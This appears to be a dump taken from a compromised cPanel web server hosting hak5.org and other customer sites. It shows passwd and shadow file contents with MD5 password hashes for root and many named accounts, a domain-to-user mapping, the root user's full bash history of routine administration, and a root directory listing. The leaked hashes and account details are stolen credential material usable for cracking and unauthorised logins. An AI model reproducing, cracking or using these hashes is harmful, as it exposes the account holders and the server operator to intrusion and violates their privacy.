stepsess:x:32085:32087::/home/stepsess:/usr/local/cpanel/bin/noshell
swelevat:x:32086:32088::/home/swelevat:/usr/local/cpanel/bin/noshell
swsupers:x:32088:32090::/home/swsupers:/usr/local/cpanel/bin/noshell
trunorth:x:32091:32093::/home/trunorth:/usr/local/cpanel/bin/noshell
valencia:x:32092:32094::/home/valencia:/usr/local/cpanel/bin/noshell
viawest:x:32093:32095::/home2/viawest:/usr/local/cpanel/bin/noshell
vwpaintr:x:32094:32096::/home/vwpaintr:/usr/local/cpanel/bin/noshell
webmedia:x:32096:32098::/home/webmedia:/bin/bash
wmrx:x:32097:32099::/home/wmrx:/bin/bash
wmrxinf:x:32098:32100::/home/wmrxinf:/bin/bash
xnadmin:x:32099:32101::/home2/xnadmin:/usr/local/cpanel/bin/noshell
clamav:x:32100:32102::/home/clamav:/bin/bash
dxssupp:x:32101:32103::/home2/dxssupp:/usr/local/cpanel/bin/noshell
jtv:x:32102:32104::/home2/jtv:/usr/local/cpanel/bin/noshell
pauooool:x:32103:32105::/home2/pauooool:/usr/local/cpanel/bin/noshell
metroa2z:x:32104:32106::/home2/metroa2z:/bin/bash
hak5darren:x:500:500:Darren Kitchen:/home/hak5darren:/bin/bash
dentistu:x:510:510::/home2/dentistu:/usr/local/cpanel/bin/noshell
gamersfe:x:511:511::/home2/gamersfe:/usr/local/cpanel/bin/noshell
logoallp:x:513:513::/home2/logoallp:/bin/bash
patelccc:x:514:514::/home2/patelccc:/usr/local/cpanel/bin/noshell
emporiam:x:515:515::/home2/emporiam:/usr/local/cpanel/bin/noshell
squadsee:x:516:516::/home2/squadsee:/usr/local/cpanel/bin/noshell
leebcor:x:519:519::/home2/leebcor:/usr/local/cpanel/bin/noshell
swimg:x:521:521::/home2/swimg:/usr/local/cpanel/bin/noshell
billherd:x:522:522::/home2/billherd:/usr/local/cpanel/bin/noshell
mclawsci:x:523:523::/home2/mclawsci:/usr/local/cpanel/bin/noshell
samurize:x:527:527::/home2/samurize:/usr/local/cpanel/bin/noshell
root:$1$M0sjvxFW$MaW2hJ4uhWRNnJ9hDuCIP0:14279:0:99999:7:::
bin:*:14070:0:99999:7:::
daemon:*:14070:0:99999:7:::
adm:*:14070:0:99999:7:::
lp:*:14070:0:99999:7:::
sync:*:14070:0:99999:7:::
shutdown:*:14070:0:99999:7:::
halt:*:14070:0:99999:7:::
mail:*:14070:0:99999:7:::
news:*:14070:0:99999:7:::
uucp:*:14070:0:99999:7:::
operator:*:14070:0:99999:7:::
games:*:14070:0:99999:7:::
gopher:*:14070:0:99999:7:::
ftp:*:14070:0:99999:7:::
nobody:*:14070:0:99999:7:::
dbus:!!:14070:0:99999:7:::
avahi:!!:14070:0:99999:7:::
mailnull:!!:14070:0:99999:7:::
smmsp:!!:14070:0:99999:7:::
apache:!!:14070:0:99999:7:::
ntp:!!:14070:0:99999:7:::
nscd:!!:14070:0:99999:7:::
vcsa:!!:14070:0:99999:7:::
rpc:!!:14070:0:99999:7:::
rpcuser:!!:14070:0:99999:7:::
nfsnobody:!!:14070:0:99999:7:::
sshd:!!:14070:0:99999:7:::
pcap:!!:14070:0:99999:7:::
rpm:!!:14070:0:99999:7:::
haldaemon:!!:14070:0:99999:7:::
xfs:!!:14070:0:99999:7:::
sabayon:!!:14070:0:99999:7:::
cpanel:*:14071::::::
named:!!:14071::::::
mysql:!!:14071::::::
mailman:*:14071::::::
cpanelhorde:*:14071::::::
cpanelphpmyadmin:*:14071::::::
cpanelphppgadmin:*:14071::::::
cpanelroundcube:*:14071::::::
rvadmin:$1$jDHnmu6Y$8kW7fZeL04DUnpL6nfzkn0:14071:0:99999:7:::
securervskin:!!:14071:0:99999:7:::
divergen:$1$daU1gXyS$IkhrDClI5ZFFyklbWeuW21:14281:0:99999:7:::
azsmile:$1$VeE7yGJr$MpL1cseLp1hPI4AnOFO.h1:14082:0:99999:7:::
bigrv4le:$1$vr_4ITXD$InDRL/nXFbXQpt3WchmvH1:14082:0:99999:7:::
bizpartn:$1$UjDOlgWV$HwMzBV4PK4KeI58mmJ2831:14428:0:99999:7:::
brannock:$1$TD4gjzYk$O7cmr1yPY6EAQ3Rik8F0a0:14082:0:99999:7:::
calmdrag:$1$c_ZkGc_V$jav09/.kdjiG/Mw6m08dM0:14082:0:99999:7:::
cgerling:$1$R.ny1llO$Oe0nOO/GUhySJKHqPYh351:14127:0:99999:7:::
charming:$1$reRPTOyx$6dilZc7gPmFLJ9XF7k//e.:14082:0:99999:7:::
chewonth:$1$rp1fPyzA$TVPQogTpOJBxctnbwQ2jo0:14082:0:99999:7:::
comefind:$1$qL75Tss7$IiwIbIulCRs0PFAbc69231:14082:0:99999:7:::
cosmetic:$1$8O75eo5H$9KXa4eUGCC5l2xDkXMmjY/:14082:0:99999:7:::
cpshout:$1$anvOh5Jd$UW6xpxlRJHoP1tsKnH5Lg1:14082:0:99999:7:::
curly:$1$7_0MHxSZ$hjIzmDnKK5nTA7okq/9T0/:14082:0:99999:7:::
dcsguys:$1$IXCBKETY$k9YtG83fOr2IrfLuQzp0k1:14082:0:99999:7:::
drfergus:$1$ucR7.Vrt$wHVq/lir.SobxpUEGWwwQ1:14201:0:99999:7:::
drkhaksa:$1$RyrWw0rm$Ot86buHfclPlmv1SE88h5.:14082:0:99999:7:::
ellis:$1$GgIROE7B$qQ.pncZmcaBkwOQTQ6kH..:14082:0:99999:7:::
fineberg:$1$iO_k8ShN$D5odZyey4VabZddc7dz0L/:14082:0:99999:7:::
fitzy:$1$5DJypmth$9K06IGZD9sP8zmAD0i3Hp/:14082:0:99999:7:::
gamingsi:$1$qSseskFT$ytXLIcAFLLX4sUQwIkGCB0:14082:0:99999:7:::
habrown:$1$j71p8.BL$FbdlZpH9fBEr2g1qAJQ7Q0:14082:0:99999:7:::
hak5:$1$f1waaEBd$O02gvwF.rTsHr2QmOp4sN1:14082:0:99999:7:::
hercules:$1$Rw2x943q$/2j1ORHHfVDWZ/29KGpnf1:14082:0:99999:7:::
hfcazc:$1$f3vvNcOu$d/TsYQZnQkrP.HmPBFhfO/:14082:0:99999:7:::
hterry3:$1$jlleQgiK$qYL5sLrZyBrLpy9jOyEk.1:14082:0:99999:7:::
judyhuey:$1$gwQ7rKcg$bwPsVS5COWXfocSmyyhhF/:14082:0:99999:7:::
justingr:$1$Vdn_iiNO$k9qAjvzfmqHGfpLfXK8tv.:14082:0:99999:7:::
jwbass:$1$3jo0y_TT$yH9.QtHOvuaIZSSyrB4zs.:14417:0:99999:7:::
kamerch:$1$F2GChrTM$Ic2b8YeVzYjwWRmIvAGGt/:14426:0:99999:7:::
lafayett:$1$VsmnUA2D$1xPXMBv4cAO4xOqDMDR/y/:14082:0:99999:7:::
linuxjoe:$1$Lrbvwsvo$b95utybgmFj/FQun2mOp4.:14082:0:99999:7:::
logoall:$1$ykpkICxb$mxM33WcjzydhnO9AOdYbq/:14368:0:99999:7:::
madera:$1$ASn8FdL3$MKaxrt4mweI5/u4C.2bFc1:14082:0:99999:7:::
mlestock:$1$oxP_U5Vg$/pr1LFJM6UUpDSC1T5zzN0:14082:0:99999:7:::
metdent:$1$2eU1kWAf$4ZzOsSlIQEAXFx9aGiJpg.:14082:0:99999:7:::
milldent:$1$auUNxaXJ$SAKqv7ohZmJLM03WjhEkd0:14082:0:99999:7:::
mydtc:$1$m1ZC20VG$Zs6UNUz8LH2WfeLxCsh3z1:14091:0:99999:7:::
mygarden:$1$75RsHa5/$2tBricF89b0u3lbnD/NEj0:14082:0:99999:7:::
norton:$1$htaT8qUb$mhJZeFwLSI0LNMK0bPJCX/:14102:0:99999:7:::
otokobos:$1$dnbcYu5K$u8XBaq/wpEuc8b63qLrlB/:14246:0:99999:7:::
paseo:$1$JLN1h6ke$8n4Z2Qz8OReukD3RmEKeY0:14082:0:99999:7:::
pcidenta:$1$_SjoOnjf$k.AoKJ3gZ9UwWkALfRy8H.:14082:0:99999:7:::
pietrzak:$1$ZHsYJKTk$dQI9oqoDzCY4HVEa2QaHq1:14082:0:99999:7:::
practice:$1$ZVW2aQqm$r6Q09XxGXfF2E4hIB3602/:14082:0:99999:7:::
prospect:$1$20Iun4NX$X5ASxvEgiInLEok0gJNVf/:14082:0:99999:7:::
qdental:$1$KXnctS83$wSJ6ywubkijA.p3twJSMN/:14082:0:99999:7:::
recreal:$1$XTltXtFh$bPoaE/k2CsMQhkVTwsNnv1:14082:0:99999:7:::
rickdurk:$1$xEwTCdSA$UCyqn.6A1oa9afEGXgodX.:14329:0:99999:7:::
sadistic:$1$Lb8zcTNO$Y1R0iX.Myx0H41MypXpe71:14396:0:99999:7:::
scream:$1$aLDGSJiw$rgFDGCjk5RV0YqwsJcrIe1:14082:0:99999:7:::
sethdiv:$1$rmLvrmXt$f/Bo9ASuhs7G.t.fWLS.w.:14082:0:99999:7:::
sethryde:$1$rWpyZzFk$r3OMFYKBhqRbrXK/w5ieI/:14082:0:99999:7:::
sharpsmi:$1$zTc1e8s3$rrzEB21pz4PQRfLyBfGkW0:14082:0:99999:7:::
sladellc:$1$QELLUnND$zPIP3SZE.6xeO.h8aIOez/:14082:0:99999:7:::
smilearc:$1$ASIMYZoh$nbSDtD8fsEWTsXaPkJaLI1:14082:0:99999:7:::
soundid:!!$1$4SPu8fM8$D8uNW11SnhYQ9CVw51wZA/:14082:0:99999:7:::
stepsess:$1$_WFak0SO$wQpvdV6WBpOVy4qg1oWGN1:14082:0:99999:7:::
swelevat:$1$Q6S00Wcp$k5R/Xt6yRYzfI7fdCh9s31:14082:0:99999:7:::
swsupers:$1$87yyLfHo$GJFIYhIUQkA9ufSnukbEK/:14082:0:99999:7:::
trunorth:$1$m2koc6EK$oQgxgvaMlQd8z212GuQgP0:14082:0:99999:7:::
valencia:$1$KYcBoKLN$viFOOMhympKW497/T2bZ/.:14342:0:99999:7:::
viawest:$1$NT8k4_7k$GYITlWdZjN1ZS6JvoBGi91:14082:0:99999:7:::
vwpaintr:$1$CQefe5bb$KmOY/hhKbQv9Jao76dUhH0:14082:0:99999:7:::
webmedia:$1$rRqFLkP6$w6OJii6o8Uc.CIGY0iZzD.:14368:0:99999:7:::
wmrx:$1$fcrD9RP_$Mmc.vowg7N2TxhEgZBiR30:14355:0:99999:7:::
wmrxinf:$1$ctMFCVpE$QKA36OoKLnzbTFauX0Fz4/:14082:0:99999:7:::
xnadmin:$1$W9tRwfgT$TlOCITN4qZlTAiZ82ClCl0:14082:0:99999:7:::
clamav:!!:14084:0:99999:7:::
dxssupp:$1$jiPGBV7E$3ioQXavyEbiNQGk5EWehg.:14091:0:99999:7:::
jtv:$1$McwnhA5N$jXzv0lalNXUaKdlDKKBhA.:14100:0:99999:7:::
pauooool:$1$XiouCuBu$cBGMBoJUxGVMcvBL0glEV/:14111:0:99999:7:::
metroa2z:$1$vG6Wlayv$eXQHO8oICwn9l6wJQjFgS.:14133:0:99999:7:::
hak5darren:$1$31381996$yQqeT4Nhjx9jYsvbt9Ngf.:14252::::::
dentistu:$1$27T7FE54$Ef8M.PXIo5MmBnTGnBTeE1:14266:0:99999:7:::
gamersfe:$1$e2ETq5Ap$b9kWLMURydC7WDk8HcYCb1:14295:0:99999:7:::
logoallp:$1$Fa4QSjld$PEMshaZ4MTH5jm0VzuzsI.:14301:0:99999:7:::
patelccc:$1$N1hgSMFq$4IzEP26ygMMVylLoCKOry0:14317:0:99999:7:::
emporiam:$1$bqzEzeWB$/iCrJ4U8hq15l9jnoWp7r/:14335:0:99999:7:::
squadsee:$1$gnGwWboa$KjYtgv2iw5dqdkyS35vc./:14345:0:99999:7:::
leebcor:$1$PSa0lIRk$AP4jlr7ZxilqsTqjjUqz7.:14349:0:99999:7:::
swimg:$1$S3CmovgU$UscADLqx.gLyrMYec58hz/:14355:0:99999:7:::
billherd:$1$bEICkMVT$rscSor.F6/dYgH7OF.wNR1:14356:0:99999:7:::
mclawsci:$1$7cJECw16$bNVOs4RstlIpcP4GpHlbH1:14377:0:99999:7:::
samurize:$1$xs40TjYc$evZG0dv6ZMAJwmOqpneO3.:14391:0:99999:7:::
root@web02 [~]# grep hak /etc/userdomains
wiki.hak5.org: hak5
lebanondds.com: drkhaksa
hakme.chrisgerling.com: cgerling
forums.hak5.org: hak5
lebanondds.drkhaksar.com: drkhaksa
ads.hak5.org: hak5
hak5.org: hak5
archive.tar.gz.hak5.org: hak5
drkhaksar.com: drkhaksa
root@web02 [~]# cat /root/.bash_history
cd www
ls
cd downloads_
ls
cd ..
ls
cd ryno
ls
cd ..
cd sys
ls
cd ..
cd /home/divergen
ls
cd www
;s
ls
mv billing billing_whmcs
mb billing_mb billing
ls
mb billing_mb billing
mv billing_mb billing
ls
mv billing billing_mb
mb billing_whmcs billing
mv billing_whmcs billing
pico .htaccess
cd /home
ls
cd /home/divergen/www/support
ls
top
service httpd stop
service mysqld stop
service mysql stop
top
service named stop
service named start
service mysql start
service httpd start
top
reboot
top
cd /etc
ls
ls
cd network
ls
pico resolv.conf
pico resolv.conf
ping google.com
ping yahoo.com
/etc/rc.d/init.d/nscd
/etc/rc.d/init.d/nscd restart
ping google.com
/etc/rc.d/init.d/nscd stop
/etc/init.d/network
/etc/init.d/network restart
cd /etc
ls
pico resolv.conf
ping 10.0.80.11
iptraf
top
top
ping google.com
ping hellsfury.com
ping yahoo.com
ssh -ND 9999 you@example.com
ssh -ND 9999 root@web02.divergentnetworks.com
ssh -ND 9999 root@divergentnetworks.com
ssh -ND 9999 root@divergentnetworks.com:62049
ssh
ssh -ND 9999 root@divergentnetworks.com -p 62049
ssh -ND 9999 root@divergentnetworks.com -p 62049
ssh -ND 9999 root@divergentnetworks.com -p 62049
locate sys_cpanel
cd /usr/local/cpanel
ls
ls
cd htdocs
ls
pico index.html
locate phpsysinfo
cd /home/xnadmin
ls
cd www
ls
cp -r
cd -r downloads /home/chewonth/www/
cd -R downloads /home/chewonth/www/
cp -r downloads /home/chewonth/www/
exit
top
top
crontab -e
service httpd restart
tp[
top
top
exit
top
service httpd stop
top
service httpd start
top
cd /home/hak5/
ls
cd www
ls
cd themes
ls
ls
cd wp-content
ls
cd themes
cd revolution_sports-10/
ls
nano footer.php
nano header.php
nano header.php
nano style.css
nano style.css
nano header.php
nano header.php
nano style.css
nano style.css
nano style.css
nano header.php
nano header.php
nano header.php
nano header.php
nano header.php
cd /home/wcars05
ls
cd etc
ls
cd .
cd ..
locate cron
locate cron
cd /home2/wcars
ls
cd /home2/wcars05
ls
locate crontab
ls
cd scripts
ls
cd ..
ls
cd /var/spool/cron/wcars05
pico /var/spool/cron/wcars05
cd /var/spool
ls
cd cron
pico divergen
php -q /home/divergen/public_html/billing/admin/cron.php
exit
cd /download
cd /downloads
wget http://configserver.com/free/cmm.tgz
wget http://configserver.com/free/cm1.tgz
wget http://configserver.com/free/cmq.tgz
ls
rm -rf cmm
rm -rf cmq
rm -rf cmq.tgz
rm -rf cmm.tgz
rm -rf cmm.tgz.1
wget http://configserver.com/free/cmm.tgz
wget http://configserver.com/free/cmq.tgz
tar -xzf cmm.tgz
cd cmm
ls
./install.sh
tar -xzf cmq.tgz
sl
cd ..
tar -xzf cmq.tgz
cd cmq
./install.sh
cd ..
ls
wget http://www.configserver.com/free/msfeinstaller.tgz
tar -zxvf msfeinstaller.tgz
perl msfeinstaller.pl
top
locate httpd.conf
cd /usr/local/apache/conf/
pico httpd.conf
service httpd restart
passwd
cd /etc
pico localdomains
pico remotedomains
pico /usr/local/cpanel/base/3rdparty/roundcube/config/main.inc.php
mail
mail divergen
top
top
top
service httpd stop
service mysql stop
service mysql start
service httpd start
service httpd start
top
cd /home/hak5
ls
cd www
ls
cd wp-includes
ls
cd ..
ls
cd wp-content
ls
cd themes
ls
cd revolution-sports-10
ls
ls
cd revolution_sports-10/
ls
ls -lha
pico header.php
tail error_log
ls
ls -lha
pico footer.php
pico footer.php
top
top
service httpd stop
top
service httpd start
top
find suspend
cd /
locate suspend
cd /usr/local/cpanel/etc/suspended.page
ls
pico index.html
pico index.html
ls
locate suspend
updatedb
locate suspend
pico /home/wmrx/public_html/suspended.page/
cd /home/wmrx/public_html/suspended.page/
ls
pico index.html
pico index.html
pico index.html
pico index.html
pico index.html
locate suspend
cd /usr/local/cpanel/etc/suspended.page/
ls
mv index.html index_old.html
pico index.html
ls
locate suspend
cd /usr/local/apache/htdocs/suspended.page/
ls
mv index.html index_old.html
pico index.html
ls
locate suspend
top
service httpd stop
service http stop
top
kill -9 13649
top
service httpd start
top
php -q /home/divergen/public_html/billing/modules/registrars/enom/enomsync.php
ping swelevator.com
cd /etc
ls
pico remotedomains
pico localdomains
pico localdomains
php -q /home/divergen/public_html/billing/modules/registrars/enom/enomsync.php
cd /etc
pico remotedomains
pico localdomains
pico /etc/remotedomains
pico /etc/localdomains
ls
cd cpanel
ls
cd ..
ls
cd usr
cd local
cd spanel
ls
cd spanel/base/frontend
ls cpaenl/base/frontend
cd cpanel
cd base
cd frontend
ls
cd dskin
ls
pico index.html
top
exit
top
top
cd /home2/samurize
ls
cd www
ls
rm -rf forums
mkdir forums
chown samurize.samurize forums
rpm -e usermin
rpm -e webmin
cd /scripts
./checkperlmodules
top
top
cd /etc
pico php.ini
cd /usr/local
ls
locate php_gd2
top
exit
top
cd /home/divergen
cd www
ls-lha
ls -lha
tar -cvf billing billing_backup.tar
tar -cvf billing_backup.tar billing
ping update.cyberduck.ch
cd /home/diveregn/www
cd /home/divergen/www
cd downloads
mkdir downloads
cd downloads
wget http://cyberduck.ch/Cyberduck-3.2.dmg
cd /usr/jtv/public_html/scrape.php
cd /home/jtv
cd /home
ls
cd /home2
cd jtv
ls
cd www
ls
./scrape.php
chmod +x scrape.php
./scrape.php
php -q scrape.php
php scrape.php
ls -lha today.php
chmod 777 today.php
tail today.php
nano scrape.php
chmod 777 scrape.php
nano scrape.php
top
service httpd restart
service httpd stop
service http stop
service httpd start
service httpd stop
service httpd start
cd /tmp
ls
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd ..
exit
cd ..
ls
cd home2
ls
cd sethryde
ls
cd public_
cd public_html/
ls
cd amplifywow.com/
ls
cd mirror/
cd patches/
cd 3.1.3/
ls
cd ..
ls
cd 3.0.2/
wget
// Begin random snipping of repetitive wgets
cd ..
ls
mkdir 3.0.3
ls
cd 3.0.3
wget
mkdir 3.0.8
ls
cd 3.0.8
ls
cd ..
ls
cd 3.1.3
ls
sdft
http://a.wirebrain.de/wow/patches/3.1.3/WoW-3.1.2.9901-to-3.1.3.9947-esES-patch
.exe
ls
ls
wget
http://a.wirebrain.de/wow/patches/3.1.3/WoW-3.1.2.9901-to-3.1.3.9947-esMX-patch
.exe
wget
http://a.wirebrain.de/wow/patches/3.1.3/WoW-3.1.2.9901-to-3.1.3.9947-esMX-patch
.zip
wget
http://a.wirebrain.de/wow/patches/3.1.3/WoW-3.1.2.9901-to-3.1.3.9947-ruRU-patch
.exe
cd ..
ls
mkdir 3.1.2
ls
cd
ls
cd public_html
ls
dir
cd ..
cd ..
ls
cd ..
cd home2
ls
cd sethryde
ls
cd public_html
cd amplifywow.com/
cd mirror/
cd patches/
cd 3.1.2
ls
exit
ls
cd ..
ls
cd home2
l
ls
cd sethryde
ls
cd public_
cd public_html/
ls
cd mirror
ls
cd ..
ls
cd amplifywow.com/
ls
cd mirror
ls
cd patches
ls
cd 3.0.8
chown
cd ..
ls
chown 3.0.8 sethryde
chown sethryde 3.0.8
chown sethryde 3.0.3
chown sethryde 3.1.2
cd ..
ls
cd patches
ls
cd 3.1.1a
ls
// snip snip...
wget http://a.wirebrain.de/wow/patches/3.0.8/WoW-3.0.8.9464-to-3.0.8.9506-ruRU-patch.zip
exit
top
cd /home2
mkdir backups
iptraf
locate backup
locate cpbackup
cd /usr/local/cpanel/logs
tail 12
cd /usr/local/cpanel/logs/cpbackup
tail 1244440801.log
tail 1244440801.log
tail 1244440801.log
tail 1244440801.log
tail -n100 1244440801.log
tail -n100 1244440801.log
top
top
cd /var/logs
cd /var/log
ls
cd /usr/local/cpanel/logs/cpbackup/
ls
tail 1244440801.log
tail 1244440801.log
tail -n1000 1244440801.log
ls -lha
tail -n1000 1244440801.log
tail -n1000 1244440801.log
tail -n1000 1244440801.log
top
exit
locate sectabs
locate d.idx
updatedb
locate *.idx
cd /home2/hak5/public_html/docuwiki/data/index/
ls
nano i10.idx
locate *.z
cd ..
cd ..
cd ..
cd wp-content
ls
cd plugins
ls
mv -R zz /home2/hak5/
mv -r zz /home2/hak5/
mv zz /home2/hak5/
top
top
service httpd stop
top
service mysql stop
top
service mysql start
service httpd start
top
service httpd stop
top
service httpd start
service named restart
service httpd stop
service httpd start
service httpd stop
servie mysql stop
service mysql stop
cd /tmp
ls
rm -rf *.*
ls
rm -rf *
service mysql start
service httpd start
ls
ls
service httpd stop
service mysql stop
cd /root
cd scripts
cd /scripts
ls
./updatenow -force
./updatenow --force
reboot
service httpd stop
cd /tmp
ls
ls
rm -rf *
ls
cd .ICE-unix/
ls
cd ..
rm -rf .*
ls
uname
uname -a
yum update kernel
yum update kernel-smp
cd /etc
ls
pico grub.conf
pico grub.conf
yum upgrade kernel.smp
yum upgrade kernel-smp
yum search smp
cd /tmp
ls
ls
top
service httpd stop
service httpd start
top
reboot
cd /tmp
ls
ls
service httpd stop
ls
cd /etc
ls
cd httpd
ls
cd conf
ls
pico httpd.conf
ls
cd ..
ls
service httpd start
cd /usr/local/apache/logs
ls
ls -lha
rm -rf error_log
touch error_log
service httpd start
tail error_log
tail -f error_log
ls
ls -lha
locate error_log
service httpd stop
who
uname -a
service httpd stop
top
ls
cd ..
ls
cd home2
ls
cd sethryde
ls
cd public_html/
ls
cd amplifywow.com/
ls
cd mirror/
ls
cd ..
rm mirror
rm -rf mirror
rmdir mir
rmdir mirror
ls
logout
w
uname -r
cat /proc/cpuinfo
vi /etc/grub.conf
free -m
cat /proc/cpuinfo
yum install kernel-PAE
free -m
uname -r
vi /etc/grub.conf
yum list | grep kernel
yum update kernel
grep MaxCli /usr/local/apache/logs/error_log
date
w
service httpd stop
top
who
w
w
watch w
w
w
w
w
w
w
w
nice top
vi /usr/local/apache/conf/httpd.conf
history
top
who
top
locate error_log
history
cd /usr/local/apache/logs
ls
ls -lha
tail error_log
tail -n 1000 error_log
tail error_log
top
w
ps aux
netstat -n
service httpd start
netstat -n
netstat -n
apf -d 216.235.148.199
csf
w
service httpd stop
killall -9 httpd
w
ps aux
iptables -L
cd /usr/src
ls
wget http://www.configserver.com/free/csf.tgz
tar -zxf csf.tgz
cd csf
ls
./install.
./install.sh
uname -a
w
ps aux
/etc/csf/csftest.pl
ls
nano readme.txt
ifconfig
w
ps aux
cd
service httpd start
netstat -n
netstat -n
w
netstat -n
w
netstat -n | more
netstat -n | gerp "87:80" | awk '{print $5}' | more
netstat -n | grep "87:80" | awk '{print $5}' | more
netstat -n | grep "87:80" | awk '{print $5}' | sed 's/:/ /' | more
netstat -n | grep "87:80" | awk '{print $5}' | sed 's/:/ /' | awk '{print $1}'
| more
netstat -n | grep "87:80" | awk '{print $5}' | sed 's/:/ /' | awk '{print $1}'
| sort |uniq -c |sort -n
csf -d 195.70.62.72
csf -d 202.157.188.79
csf -d 76.73.90.250
csf -d 216.235.148.199
csf -d 98.184.177.211
csf -d 216.243.150.138
csf -d 93.188.245.224
w
ps aux
top
netstat -n
ifconfig
netstat -n
host 75.126.127.87
nano /etc/httpd/conf/httpd.conf
ls /home
w
cd
ps aux
top
tail -f /etc/httpd/logs/error_log
tail -f /etc/httpd/domlogs/hak5.org
csf -d 93.93.112.45
tail -f /etc/httpd/domlogs/hak5.org
w
top
who
top
tail -f /etc/httpd/domlogs/hak5.org
w
dmesg
top
w
ps aux
top
/scripts/easyapache
cd /usr/local/apache/conf
ls
cat php.conf
/usr/local/cpanel/bin/rebuild_phpconf
/usr/local/cpanel/bin/rebuild_phpconf 5 none suphp 1
w
tail -f /etc/httpd/logs/error_log
cd /home
ls
ls -l
df -h
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type d;done
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type d -exec
chmod 755 {} \;
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type d -exec
chmod 755 {} \;done;
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type d -exec
chmod 755 {} \;;done;
tail -f /etc/httpd/logs/error_log
nano /home2/hak5/public_html/php.ini
nano /home/hak5/subdomains/wiki/.htaccess
w
tail -f /etc/httpd/logs/error_log
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type f -exec
chmod 655 {} \;;done;
tail -f /etc/httpd/logs/error_log
tail -f /etc/httpd/logs/error_log
tail -n 1000 /etc/httpd/logs/error_log
tail -f /etc/httpd/logs/error_log
ls /home2/jtv/public_html/today.php
cd /home2
ls
ls -l
for i in `ls /var/cpanel/users`;do find /home2/$i/public_html -type d -exec
chmod 755 {} \;;done;
for i in `ls /var/cpanel/users`;do find /home2/$i/public_html -type f -exec
chmod 655 {} \;;done;
tail -f /etc/httpd/logs/error_log
w
ps aux
top
w
ps aux
netstat -n
ls /proc/ |grep recent
cd /proc
ls
cd net
ls
cd ipt_recent/
ls
cat 80
w
cd
psa ux
dmesg
ls
/tmp
cat dead.letter
w
tail -f /etc/httpd/logs/error_log
tail -n 100 /etc/httpd/logs/error_log
cd /usr/local/apache
ls
cd logs/
ls
tail -f suphp_log
cd
w
ps aux
tail -f suphp_log
cd /usr/local/apache/logs
ls
cat error_log  |grep php_
cat error_log  |grep php_
tail -f error_log
ls -l
/home2/hak5/public_html/wp-content/plugins/wordpress-automatic-upgrade/js/wp-wp
au.js.php
cd /home
for i in `ls /var/cpanel/users`;do find /home2/$i/public_html -type f -exec
chown $i:$i {} \;;done;
for i in `ls /var/cpanel/users`;do find /home/$i/public_html -type f -exec
chown $i:$i {} \;;done;
tail -f error_log
cd /usr/local/apache/logs/
ls
tail -f error_log
exit
cd /tmp
ls
ls
cd eaccelerator/
ls
cd f
ls
cd f
ls
cd ..
cd ..
cd ..
service httpd stop
rm -rf eaccelerator/
service httpd start
csf
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service nfslock stop
chkconfig nfslock off
service cups stop
chkconfig cups off
top
cd /etc
pico grub.conf
uname -a
pico grub.conf
top
top
cd /home
ls
cd samurize
cd home2
cd samurize
cd /home2
ls
cd samurize
ls
cd www
ls
ls -lha
cd /home/hak5
ls
cd www
ls -lha
cd wp-content
ls
ls -lha
cd uploads
ls
ls 0lha
ls -lha
cd 2008
ls
ls -lha
cd ..
cd 2009
ls
ls -lha
cd ..
cd ..
chown hak5.hak5 *
ls
ls -lha
rm advanced-cache.php
chown hak5.hak5 *
chown -R hak5.hak5 *
ls
ls -lha
cd ..
chown -R hak5.hak5 *
ls -lha
cd /home2/samurize
ls
cd www
ls
ls -lha
cd forums
ls -lha
cd admin
ls -lha
cd ..
ls
cd uploads
ls -lha
cd ..
cd ..
chown -R samurize.samurize *
cd forums/uploads
ls
ls -lha
top
cd /home/jtv
cd /home
ls
cd /home2
ls
cd jtv
ls
cd www
chown -R jtv.jtv *
who
top
tracert 173.53.70.112
traceroute 173.53.70.112
root@web02 [~]# ls -la /root
total 6780
drwxr-x--- 21 root root    4096 Jul 12 05:19 ./
drwxr-xr-x 27 root root    4096 Jun 28 19:29 ../
-rw-------  1 root root     957 Jul 23	2008 .accesshash
-rw-------  1 root root   23242 Jul  8 12:24 .bash_history
-rw-r--r--  1 root root      24 Jan  6	2007 .bash_logout
-rw-r--r--  1 root root     191 Jan  6	2007 .bash_profile
-rw-r--r--  1 root root     176 Jan  6	2007 .bashrc
drwxr-xr-x  4 root root    4096 Jul 11	2008 .cpanel/
drwxr-xr-x  4 root root    4096 Jul 11	2008 cpanel3-skel/
drwx------  3 root root    4096 Jul 11	2008 .cpobjcache/
-rw-r--r--  1 root root     100 Jan  6	2007 .cshrc
-rw-------  1 root root       4 Feb  4 10:38 dead.letter
drwxr-xr-x  2 root root    4096 Nov 28	2008 downloads/
-rw-r--r--  1 root root      28 Jul 23	2008 .forward
drwx------  3 root root    4096 Jul 10	2008 .gconf/
drwx------  2 root root    4096 Jul 10	2008 .gconfd/
drwx------  2 root root    4096 Mar  5 03:15 .gnupg/
-rw-------  1 root root      75 Jun 26 16:06 .lesshst
drwxr-xr-x  2 root root    4096 Jul 24	2008 .lftp/
drwx------  6 root root    4096 Jul 11	2008 .MirrorSearch/
-rw-------  1 root root      46 Jul 11	2008 .my.cnf
-rw-------  1 root root     152 Jul 22	2008 .mysql_history
-rw-r--r--  1 root root     299 Jul  3 03:16 .pearrc
drwxr-xr-x  2 root root    4096 Jul 11	2008 public_ftp/
drwxr-xr-x  3 root root    4096 Jul 11	2008 public_html/
drwxr-xr-x  2 root root    4096 Jul 24	2008 .razor/
-rw-------  1 root root    1024 Feb 27 03:14 .rnd
drwxr-xr-x  7 root root    4096 Jul 11 06:07 rvadmin/
-rwxr-xr-x  1 root root     151 Jul 24	2008 sa_rules.sh*
drwxr-xr-x  3 root root    4096 Jul 11	2008 .sl-orig-configs/
drwx------  3 root root    4096 Jul 11	2008 .spamassassin/
drwx------  2 root root    4096 Jul 11	2008 .ssh/
-rw-r--r--  1 root root     129 Jan  6	2007 .tcshrc
drwxr-xr-x  3 root root    4096 Aug 30	2008 tmp/
drwxr-xr-x  2 root root    4096 Nov 28	2008 .tmp/
drwxr-xr-x  3 root root    4096 Nov 28	2008 .usermin/
-rw-r--r--  1 root root 6124217 Oct 24	2008 usermin-1.370-1.noarch.rpm
